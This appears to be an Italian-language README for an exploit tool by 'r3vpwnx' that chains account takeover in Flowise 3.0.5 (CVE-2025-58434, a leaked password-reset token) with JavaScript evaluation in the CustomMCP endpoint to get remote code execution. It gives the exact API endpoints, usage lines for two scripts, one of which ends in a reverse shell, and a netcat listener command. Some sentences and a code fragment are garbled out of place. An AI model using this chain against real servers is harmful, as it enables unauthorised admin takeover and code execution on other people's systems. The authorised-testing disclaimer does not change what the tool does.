
Catena di exploit per Flowise 3.0.5: acquisizione non autenticata dell'account tramite divulgazione del token di reset della password (CVE-2025-58434) combinata con la valutazione JavaScript di CustomMCP per l'esecuzione remota di codice.
Due problemi di Flowise 3.0.5, concatenati:
POST /api/v1/account/forgot-password restituisce il tempToken dell'utente target
direttamente nella risposta JSON. Forniscilo a POST /api/v1/account/reset-password
per impostare una password nota per qualsiasi account, incluso il primo admin -> completa
acquisizione non autenticata dell'account.mcpServerConfig in CustomMCP.
Con una sessione e una chiave API del workspace (dal passaggio 1),
POST /api/v1/node-load-method/customMCP con loadMethod=listActions
valuta la stringa mcpServerConfig come JavaScript nel processo Flowise,
fornendo RCE tramite . (Problema separato di Flowise
usato qui solo per trasformare l'ATO in esecuzione di codice; nessun CVE assegnato al
momento della scrittura.)require('child_process').exec()CVE: CVE-2025-58434
python3 -m pip install requests
flowise_ato_foothold.py - catena completa (ATO -> chiave API -> reverse shell CustomMCP)python3 flowise_ato_foothold.py <LHOST> <LPORT> [TARGET_IP] [FLOWISE_VHOST]
# tieni pronto `nc -lvnp <LPORT>`
flowise_customMCP_rce.py - solo RCE CustomMCP (richiede una chiave API)python3 flowise_customMCP_rce.py '<comando>' '<CHIAVE_API_FLOWISE>'
Solo per test di sicurezza autorizzati e scopi educativi. Esegui questo strumento esclusivamente contro sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta per i test.
Autore: r3vpwnx